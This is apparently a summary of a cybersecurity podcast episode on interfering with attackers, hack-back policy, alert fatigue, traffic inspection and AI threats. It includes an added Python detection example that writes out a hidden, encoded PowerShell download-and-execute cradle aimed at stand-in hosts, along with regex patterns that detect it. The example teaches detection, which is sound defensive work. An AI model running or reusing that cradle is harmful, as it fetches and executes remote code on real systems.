Threat Vector: "From Policy to Cyber Interference"
Podcast: Threat Vector by Palo Alto Networks
Episode Date: August 28, 2025
Guest Host: Michael Sikorsky (CTO, Unit 42, Palo Alto Networks)
Guest: Tom Bossert (President, Trinity Cyber; former US Homeland Security Advisor; Distinguished Fellow, Atlantic Council)
Episode Overview
This episode of Threat Vector dives into the evolving intersection of national cybersecurity policy and real-world threat interference. Michael Sikorsky, stepping in as guest host, welcomes Tom Bossert to explore how proactive, mid-operation interference with cyber attackers is transforming both the private sector’s approach to defense and the larger policy landscape. Together, they examine why the industry’s current reactive strategies aren’t enough, debate the privatization of offensive cyber operations, and discuss the technical underpinnings of manipulating network traffic as a next-gen defense strategy.
Key Discussion Points & Insights
1. The State of Cybersecurity: From Detection to Interference
- Shift from Incident Response to Real-Time Interference
- Sikorsky shares the appeal of interfering with attackers mid-operation, contrasting it with traditional incident response, which often happens too late:
- "It's the idea of, like, messing with them as they're trying to attack us is just such a pleasant thing, because it seems like when you come and do incident response, it's like it's already too late, right?" (02:13)
- Bossert agrees, highlighting the satisfaction and effectiveness of disrupting adversaries directly, drawing parallels with government work but emphasizing new legal, commercial avenues:
- "You'd have to be in the government to do something that's directly intended to interfere with the adversary's operational outcome. But we found a way to do it in a commercial way that's legal, effective. It's just fun." (02:51)
2. Debate on Offensive Security and Policy Disconnects
- Defining 'Offensive' and 'Defensive' Operations
- Bossert warns of a "massive disconnect" between policymakers’ rhetoric of 'hacking back' and the technical and operational realities:
- "One of my biggest fears is the massive disconnect between those policymakers that say that and what you know to be the case and how the tech works and what it really means." (04:05)
- Emphasizes that targeted, reciprocal action—using the adversary’s own momentum against them like "judo"—is more productive than indiscriminate retaliation:
- "It's reciprocal. The idea here is that we're not going to do anything to impose any consequence on you unless you first start it... It's like judo, where you take the energy of the attacker back on himself." (06:11)
- Limits of 'Hack Back' and Policy Levers
- Challenges the effectiveness of tit-for-tat hacking, especially against adversaries like China:
- "Would they even care if we did the same [to them]? ...You want to hack all the Chinese businesses to get China to behave differently? I don't know. I don't think that's the best way." (05:29-06:51)
3. Privatization and the Role of Industry in Offensive Defense
- Private Sector Increasingly Engaged in Active Defense
- Sikorsky asks about the potential shift of offensive security from government agencies to the private sector.
- Bossert compares rules of engagement to military analogs: you "shoot back" only if attacked, not as an act of spite or revenge:
- "There's a misnomer in the cyber world that shoot back is kind of a pause thing ... we're trying to do here is to create friction. The kind of pain... that throws off their operations..." (07:31-08:24)
4. Transition from Policy to Operations
- Bossert’s Move from National Policy to Startup Execution
- Describes the need for those shaping policy to eventually return to operational roles for real impact:
- "If you don't eventually get tired of that and long deep back into some operational role where you can make a difference, well, you're not part of the solution." (08:47)
- The “spark” for joining Trinity was to be hands-on fighting threats in the real world, using boundary defense tech that has lasting effects— likened to an "electric fence":
- "It's an electric fence. You know, there's a consequence to touching it, and it changes the behavior of the people that consider touching it." (09:44)
5. Challenges in Detection and Incident Response Overload
- Detection Overload and Transformation of Defense
- Sikorsky underscores that while the industry excels at detecting attacks, the outcome is "too many alerts" and "correlation fatigue":
- "The problem that we ended up creating was all of these alerts. Right. That like, everything is going off, some of them, some products better than others at sending out the alerts. But then you have all of these alerts now what do you do?" (10:49)
- Bossert critiques the focus on endpoint detection (the “target” side) versus focusing on the attacker:
- "How many endpoints are there? Millions. Billions... And the alerts that we're producing are coming from every enterprise target... There are not that many adversaries on the other end of this equation. Maybe ... 4,000 hackers that have in the world the skill set necessary..." (11:30)
6. Reversing the Problem: Attacker-Focused Defense
- Attackers Change Techniques Less Often than Defenders Think
- Proposes focusing on attacker techniques rather than constantly shifting IOCs:
- "If you can open up the network traffic and inspect it to a level of depth and content where you were confidently finding them, their techniques... you can start to make a more manageable outcome. That's what I mean by more fun." (13:20)
- Sikorsky introduces the "graph"—the closer you get to attacker behavior, the harder it is for them to adapt and the more effective defenses become:
- "The IOCs that are simple to change with a flip of a bit, that's not what you want to go after. You want to move as far to the developer as you can ..." (14:23)
- Both agree that targeting attacker TTPs (tactics, techniques, and procedures) imposes more cost and forces deeper changes—referencing David Bianco’s “Pyramid of Pain.” (15:29)
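To make the Pyramid of Pain argument above concrete, here is an added example (not code from the episode, Palo Alto Networks or Trinity Cyber) that runs an IOC-based rule and a technique-based rule over constructed process-creation events. The dropper hashes, the C2 domains and the events themselves are hypothetical; build 2 of the dropper is build 1 with "a flip of a bit", and the second C2 host is a new domain, so the hash and domain IOCs miss it while the technique rule (hidden-window, encoded PowerShell that downloads and executes) still fires. The two benign events show the technique rule does not simply alert on every encoded command.

```python
"""
Added example: IOC matching versus technique matching over constructed
endpoint events. Nothing here is real telemetry or a real indicator.
"""
import base64
import hashlib
import re
from dataclasses import dataclass


def sha256_hex(data: bytes) -> str:
    return hashlib.sha256(data).hexdigest()


# Hypothetical dropper builds: build 2 differs from build 1 by one flipped bit,
# so the file hash the IOC feed knows no longer matches.
DROPPER_BUILD_1 = sha256_hex(b"dropper build 1")
DROPPER_BUILD_2 = sha256_hex(b"dropper build 1 with one bit flipped")
INSTALLER = sha256_hex(b"corporate installer")

BAD_HASHES = {DROPPER_BUILD_1}      # what the feed knew at the time
BAD_DOMAINS = {"c2.invalid"}        # likewise


def encode_ps(script: str) -> str:
    """Encode as powershell.exe -EncodedCommand expects: UTF-16LE, then base64."""
    return base64.b64encode(script.encode("utf-16le")).decode("ascii")


@dataclass(frozen=True)
class ProcessEvent:
    parent_sha256: str   # hash of the process that launched PowerShell
    cmdline: str


CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://{host}/stage1')"

# Constructed telemetry: two attacker launches, two benign launches.
EVENTS = [
    ProcessEvent(DROPPER_BUILD_1, "powershell.exe -nop -w hidden -enc "
                 + encode_ps(CRADLE.format(host="c2.invalid"))),
    ProcessEvent(DROPPER_BUILD_2, "powershell.exe -nop -w hidden -ec "
                 + encode_ps(CRADLE.format(host="c2-two.invalid"))),
    ProcessEvent(INSTALLER, "powershell.exe -ExecutionPolicy Bypass -File C:\\deploy\\deploy.ps1"),
    ProcessEvent(INSTALLER, "powershell.exe -EncodedCommand "
                 + encode_ps("Get-Process | Out-File C:\\temp\\procs.txt")),
]

# -e, -ec and -enc are accepted abbreviations of -EncodedCommand; this covers the
# common ones, not every unique prefix PowerShell accepts.
ENC_RE = re.compile(r"(?:^|\s)-(?:e|ec|enc|encodedcommand)\s+([A-Za-z0-9+/=]+)", re.I)
# Download-and-execute cradle: an expression evaluator plus a web fetch.
CRADLE_RE = re.compile(
    r"\b(?:iex|invoke-expression)\b.*\b(?:downloadstring|downloadfile|invoke-webrequest|iwr)\b",
    re.I | re.S)
HOST_RE = re.compile(r"https?://([A-Za-z0-9.-]+)", re.I)


def decode_encoded_command(cmdline: str):
    """Return the decoded script if the command line carries an encoded command, else None."""
    m = ENC_RE.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16le", errors="replace")
    except (ValueError, UnicodeDecodeError):
        return None


def ioc_match(ev: ProcessEvent) -> bool:
    """Bottom of the pyramid: a known-bad hash or a known-bad domain in the payload."""
    if ev.parent_sha256 in BAD_HASHES:
        return True
    script = decode_encoded_command(ev.cmdline) or ""
    return any(host.lower() in BAD_DOMAINS for host in HOST_RE.findall(script))


def technique_match(ev: ProcessEvent) -> bool:
    """Top of the pyramid: encoded PowerShell whose decoded body is a download cradle."""
    script = decode_encoded_command(ev.cmdline)
    return script is not None and CRADLE_RE.search(script) is not None


def evaluate(events):
    """(ioc_hit, technique_hit) per event, in order."""
    return [(ioc_match(ev), technique_match(ev)) for ev in events]


if __name__ == "__main__":
    for ev, (ioc, tech) in zip(EVENTS, evaluate(EVENTS)):
        print(f"ioc={ioc!s:5} technique={tech!s:5} parent={ev.parent_sha256[:12]} {ev.cmdline[:48]}")
```

Run as a script and the first event trips both rules, the rebuilt second event trips only the technique rule, and neither benign event trips either. The attacker's cost to evade the first rule was a rebuild and a new domain; evading the second means giving up the hidden encoded cradle, which is the behavioural change the conversation is after.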
7. Technical Deep Dive: Network Traffic Manipulation & Break and Inspect
- Encrypted Traffic Inspection Challenges
- Sikorsky shares that even Palo Alto Networks’ customers resist "break and inspect," despite clear defensive benefits:
- "But one thing we have a big issue with still to this day is doing break and inspect of encrypted traffic... so many still don't." (16:59)
- Bossert explains the technical and organizational resistance—availability vs. security divisions—and argues for stronger executive leadership to prioritize security:
- "Anything that makes the Internet less reliable, less available, or slower, or even makes me do any work outside of what I already do, is unnecessary to my outcomes. ...it is incumbent on them to reach down and to play referee in that debate." (18:01)
- Both criticize the industry for favoring technically easy but less effective compliance exercises over more impactful, but organizationally challenging, traffic inspection.
8. Artificial Intelligence: Next Wave of Threats and Defenses
- AI on Offense and Defense
- Sikorsky describes “agentic” AI red teams—attackers using autonomous agents:
- "You give it a problem, it's outsolving, it's scanning, it's poking holes, it's grabbing payloads and embedding in malware and shipping off all on its own." (20:40)
- Bossert asserts that Trinity’s approach, focusing on content and technique, is uniquely effective against AI-generated attacks:
- "AI, no matter how it's trained... We're going to find the presence of the exploit in the content. ...We're going to find that and remove that appended data from the traffic in flight so that what gets to the endpoint doesn't have the AI generated payload in it." (21:25)
9. Policy, Self-Help, and the Future of Cybersecurity
- Personal Responsibility over Government Reliance
- Bossert issues a call to action for CISOs and organizations:
- "There is absolutely nothing that's going to change this current trend that we're on, other than the CISOs who are responsible for defending their networks, taking the right action, seeking the right funding, applying the right sets of tools and innovative solutions..." (23:20)
- He is skeptical about government’s ability to solve cybersecurity, advocating for nonpartisan, operator-driven approaches:
- "The government's really got to stay in the world of doing what they are good at. ...there should be some kind of nonpartisan consensus that how to best defend the country and the businesses." (25:31)
10. Political and Cultural Challenges
- Regulation, Partisanship, and Cyber Norms
- Bossert laments growing partisanship’s impact on the formerly “righteous” cyber operator subculture:
- "The most disappointing thing for me is to see that this partisanship that's so ugly right now has now started to hit our community." (27:34)
- Emphasizes the fundamental principle: defense of property and data should be a nonpartisan, cultural imperative.
Notable Quotes and Memorable Moments
| Timestamp | Speaker | Quote |
|-----------|---------|-------|
| 02:13 | Sikorsky | "Messing with them as they're trying to attack us is just such a pleasant thing... when you do incident response, it's already too late." |
| 02:51 | Bossert | "You'd have to be in government to do something that's directly intended to interfere with the adversary's operational outcome. But we found a way... that's legal, effective. It's just fun." |
| 06:11 | Bossert | "It's reciprocal. The idea here is that we're not going to do anything to impose any consequence on you unless you first start it... It's like judo, where you take the energy of the attacker back on himself." |
| 08:47 | Bossert | "If you don't eventually get tired of that and long deep back into some operational role where you can make a difference, well, you're not part of the solution." |
| 13:20 | Bossert | "If you can open up the network traffic and inspect it to a level of depth... where you were confidently finding them, their techniques... you can start to make a more manageable outcome." |
| 15:29 | Bossert | "We've ended up encouraging them to create more ephemeral IOCs because we're going after those IOCs. And so it becomes not only not effective, but it becomes a cost center..." |
| 21:25 | Bossert | "We're going to find the presence of the exploit in the content... remove that appended data from the traffic in flight so that what gets to the endpoint doesn't have the AI generated payload in it." |
| 23:20 | Bossert | "There is absolutely nothing that's going to change this current trend that we're on, other than the CISOs... taking the right action, seeking the right funding, applying the right sets of tools..." |
| 25:31 | Bossert | "There should be some kind of nonpartisan consensus that how to best defend the country and the businesses." |
| 27:43 | Bossert | "The most disappointing thing for me is to see that this partisanship... has now started to hit our community." |
Fun Bonus Clip – Behind the Scenes
[30:10] The hosts share a light-hearted Kenny Loggins-themed password joke that goes right over Sikorsky’s head, much to Bossert’s amusement:
- "Hey, Mike, you know I changed all my passwords to Kenny. Now I have all Kenny logins."
- Sikorsky: "Just Danger zone. What Danger zone?"
- Bossert: "Do you hear it? Kenny Loggins."
- Team: Laughter ensues as Mike doesn’t get the reference.
- "Anybody listening? Kenny Loggins is a fantastic punchline. And Mike, just right over his head." (30:47)
Takeaway for Security Pros
This conversation highlights the urgency of attacker-focused, operational defense and the necessity for CISOs and security leaders to break old paradigms. Technical innovation—especially in manipulating traffic and identifying attacker techniques, even as threats are increasingly AI-powered—is the new frontier. Policy must catch up, but in the meantime, self-help, collaboration, and a willingness to "mess with" attackers within ethical and legal bounds are critical.
Recommended Segment Timestamps:
- [04:05] – Discussion on "offensive" vs. "defensive"
- [09:44] – Electric fence metaphor and motivation for innovation
- [13:20] – On attacker techniques and managing the scale
- [16:59] – Break and inspect debate in practice
- [20:40] – The AI arms race in offense vs. defense
- [23:20] – Call to action for organizational self-help
- [25:31] – The need for nonpartisan consensus
- [30:10] – Kenny Loggins joke (bonus moment)
Tone:
Candid, passionate, and direct, with plenty of technical depth and a clear operator’s mindset. The episode balances policy nuance with no-nonsense operational advice, punctuated by moments of humor and personal camaraderie.
